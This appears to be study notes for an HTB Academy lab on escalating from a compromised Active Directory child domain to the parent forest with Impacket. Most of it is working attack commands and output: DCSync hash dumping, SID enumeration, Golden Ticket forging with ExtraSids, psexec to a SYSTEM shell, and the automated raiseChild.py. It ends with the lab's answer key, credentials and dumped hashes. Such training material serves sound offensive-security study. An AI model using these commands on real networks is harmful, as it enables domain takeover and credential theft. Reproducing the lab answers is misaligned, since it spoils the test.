🐧Child → Parent Trust Attacks - from Linux

🎯 HTB Academy: Active Directory Enumeration & Attacks

📍 Overview

Child → Parent Trust Attacks from Linux leverage the Impacket toolkit to perform ExtraSids attacks against Active Directory forests. This approach provides cross-platform capability for SID History exploitation, enabling Linux-based attackers to escalate from child domain compromise to complete forest control using Python-based tools.

🛠️ Linux Attack Methodology

Required Data Points (Same as Windows)

Component

Linux Collection Method

Example Value

KRBTGT hash

impacket-secretsdump DCSync

9d765b482771505cbe97411065964d5f

Child domain SID

impacket-lookupsid enumeration

S-1-5-21-2806153819-209893948-922872689

Target username

Arbitrary (can be fake)

hacker

Child domain FQDN

Target specification

LOGISTICS.INLANEFREIGHT.LOCAL

Enterprise Admins SID

impacket-lookupsid parent domain

S-1-5-21-3842939050-3880317879-2865463114-519

Step 1: KRBTGT Hash Extraction

# DCSync attack for KRBTGT account
impacket-secretsdump logistics.inlanefreight.local/htb-student_adm@172.16.5.240 -just-dc-user LOGISTICS/krbtgt

# Output extract:
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:9d765b482771505cbe97411065964d5f:::

Step 2: Child Domain SID Discovery

# SID brute forcing for child domain
impacket-lookupsid logistics.inlanefreight.local/htb-student_adm@172.16.5.240 | grep "Domain SID"

# Output: [*] Domain SID is: S-1-5-21-2806153819-209893948-922872689

Step 3: Enterprise Admins SID Enumeration

# Target parent domain controller for Enterprise Admins SID
impacket-lookupsid logistics.inlanefreight.local/htb-student_adm@172.16.5.5 | grep -B12 "Enterprise Admins"

# Output extract:
# [*] Domain SID is: S-1-5-21-3842939050-3880317879-2865463114
# 519: INLANEFREIGHT\Enterprise Admins (SidTypeGroup)

Step 4: Golden Ticket Creation

# Create Golden Ticket with ExtraSids
impacket-ticketer -nthash 9d765b482771505cbe97411065964d5f -domain LOGISTICS.INLANEFREIGHT.LOCAL -domain-sid S-1-5-21-2806153819-209893948-922872689 -extra-sid S-1-5-21-3842939050-3880317879-2865463114-519 hacker

# Output: [*] Saving ticket in hacker.ccache

Step 5: Environment Setup & Exploitation

# Set Kerberos credential cache
export KRB5CCNAME=hacker.ccache

# Access parent domain controller
impacket-psexec LOGISTICS.INLANEFREIGHT.LOCAL/hacker@academy-ea-dc01.inlanefreight.local -k -no-pass -target-ip 172.16.5.5

# Result: SYSTEM shell on parent domain DC

🚀 Automated Attack Option

raiseChild.py - Complete Automation

# Automated child → parent domain escalation
impacket-raiseChild -target-exec 172.16.5.5 LOGISTICS.INLANEFREIGHT.LOCAL/htb-student_adm

# Automated workflow:
# 1. Find child domain controller
# 2. Identify forest FQDN
# 3. Get Enterprise Admin SID
# 4. Extract KRBTGT credentials
# 5. Create Golden Ticket with ExtraSids
# 6. Authenticate to parent domain
# 7. Retrieve Administrator credentials
# 8. Launch PSExec shell

Automation Workflow

# raiseChild.py process:
# Input: Child domain admin credentials
# Process: 
#   - Get child DC info (MS-NRPC)
#   - Find forest FQDN (MS-NRPC)  
#   - Get Enterprise Admin SID (MS-LSAT)
#   - Get KRBTGT credentials (MS-DRSR)
#   - Create Golden Ticket with ExtraSids
#   - Authenticate and extract target user
# Output: Parent domain credentials + PSExec shell

🎯 HTB Academy Lab Solution

Lab Environment Setup

# SSH to Linux attack host
ssh htb-student@<target-ip>
# Password: HTB_@cademy_stdnt!

🎫 Question: "Perform the ExtraSids attack to compromise the parent domain from the Linux attack host. After compromising the parent domain obtain the NTLM hash for the Domain Admin user bross. Submit this hash as your answer."

Complete Verified Lab Solution:

Step 1: SSH to Linux Attack Host

# Connect to target system
ssh htb-student@10.129.206.246
# Password: HTB_@cademy_stdnt!

# Successful connection output:
Linux ea-attack01 5.15.0-15parrot1-amd64 #1 SMP Debian 5.15.15-15parrot2 (2022-02-15) x86_64
 ____                      _     ____            
|  _ \ __ _ _ __ _ __ ___ | |_  / ___|  ___  ___ 
| |_) / _` | '__| '__/ _ \| __| \___ \ / _ \/ __|
|  __/ (_| | |  | | | (_) | |_   ___) |  __/ (__ 
|_|   \__,_|_|  |_|  \___/ \__| |____/ \___|\___|

┌─[htb-student@ea-attack01]─[~]
└──╼ $

Step 2: Automated ExtraSids Attack with raiseChild.py

# Execute automated child → parent domain escalation
raiseChild.py -target-exec 172.16.5.5 LOGISTICS.INLANEFREIGHT.LOCAL/htb-student_adm
# Password: HTB_@cademy_stdnt_admin!

# Complete attack output:
Impacket v0.9.24.dev1+20211013.152215.3fe2d73a - Copyright 2021 SecureAuth Corporation

Password:
[*] Raising child domain LOGISTICS.INLANEFREIGHT.LOCAL
[*] Forest FQDN is: INLANEFREIGHT.LOCAL
[*] Raising LOGISTICS.INLANEFREIGHT.LOCAL to INLANEFREIGHT.LOCAL
[*] INLANEFREIGHT.LOCAL Enterprise Admin SID is: S-1-5-21-3842939050-3880317879-2865463114-519
[*] Getting credentials for LOGISTICS.INLANEFREIGHT.LOCAL
LOGISTICS.INLANEFREIGHT.LOCAL/krbtgt:502:aad3b435b51404eeaad3b435b51404ee:9d765b482771505cbe97411065964d5f:::
LOGISTICS.INLANEFREIGHT.LOCAL/krbtgt:aes256-cts-hmac-sha1-96s:d9a2d6659c2a182bc93913bbfa90ecbead94d49dad64d23996724390cb833fb8
[*] Getting credentials for INLANEFREIGHT.LOCAL
INLANEFREIGHT.LOCAL/krbtgt:502:aad3b435b51404eeaad3b435b51404ee:16e26ba33e455a8c338142af8d89ffbc:::
INLANEFREIGHT.LOCAL/krbtgt:aes256-cts-hmac-sha1-96s:69e57bd7e7421c3cfdab757af255d6af07d41b80913281e0c528d31e58e31e6d
[*] Target User account name is administrator
INLANEFREIGHT.LOCAL/administrator:500:aad3b435b51404eeaad3b435b51404ee:88ad09182de639ccc6579eb0849751cf:::
INLANEFREIGHT.LOCAL/administrator:aes256-cts-hmac-sha1-96s:de0aa78a8b9d622d3495315709ac3cb826d97a318ff4fe597da72905015e27b6
[*] Opening PSEXEC shell at ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
[*] Requesting shares on ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL.....
[*] Found writable share ADMIN$
[*] Uploading file ujegaPyX.exe
[*] Opening SVCManager on ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL.....
[*] Creating service PFJg on ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL.....
[*] Starting service PFJg.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

Step 3: Extract Target User Credentials

# Use extracted administrator credentials for DCSync attack
secretsdump.py inlanefreight.local/administrator@172.16.5.5 -hashes aad3b435b51404eeaad3b435b51404ee:88ad09182de639ccc6579eb0849751cf -just-dc | grep bross

# Target extraction result:
inlanefreight.local\bross:1179:aad3b435b51404eeaad3b435b51404ee:49a074a39dd0651f647e765c2cc794c7:::

🎯 Answer: 49a074a39dd0651f647e765c2cc794c7

Key Lab Insights:

raiseChild.py automation: Complete ExtraSids attack with single command
Credential extraction: Tool provides both child and parent domain credentials automatically
Administrator hash: 88ad09182de639ccc6579eb0849751cf extracted for further operations
Target achievement: bross user hash 49a074a39dd0651f647e765c2cc794c7 successfully obtained

⚠️ Tool Considerations

Manual vs Automated Approach

Manual methodology: Better understanding, troubleshooting capability, controlled execution
Automated tools: Faster execution but less control, potential production environment risks
Best practice: Understand manual process before using automation

Impacket Tool Prefix

# Modern Impacket installations use prefix:
impacket-secretsdump  # instead of secretsdump.py
impacket-lookupsid    # instead of lookupsid.py  
impacket-ticketer     # instead of ticketer.py
impacket-psexec       # instead of psexec.py
impacket-raiseChild   # instead of raiseChild.py

Environment Variables

KRB5CCNAME: Points system to Kerberos credential cache file
Critical for ticket usage: Must be set before authentication attempts
Ticket persistence: ccache files enable reusable authentication

🔑 Key Takeaways

Cross-Platform Attack Capability

Windows Mimikatz/Rubeus ↔ Linux Impacket Toolkit
    (Native AD Tools)         (Python-based Tools)
         ↓                           ↓
   Same Attack Goals        Same Technical Result

Critical Success Factors

Data consistency: Same 5 data points required as Windows approach
Tool proficiency: Understanding Impacket toolkit capabilities
Environment setup: Proper KRB5CCNAME configuration
Attack validation: Verification of parent domain access

Professional Value

Platform flexibility: Attack capability regardless of operating system
Tool diversification: Multiple approaches for same objective
Troubleshooting skills: Manual understanding enables problem resolution
Assessment completeness: Linux-based penetration testing capability

🐧 Linux-based Child → Parent trust attacks provide cross-platform forest compromise capability - demonstrating that sophisticated AD attacks can be executed effectively from any operating system using the powerful Impacket toolkit!

PreviousChild → Parent Trust Attacks NextCross-Forest Trust Abuse - from Windows

Last updated 5 months ago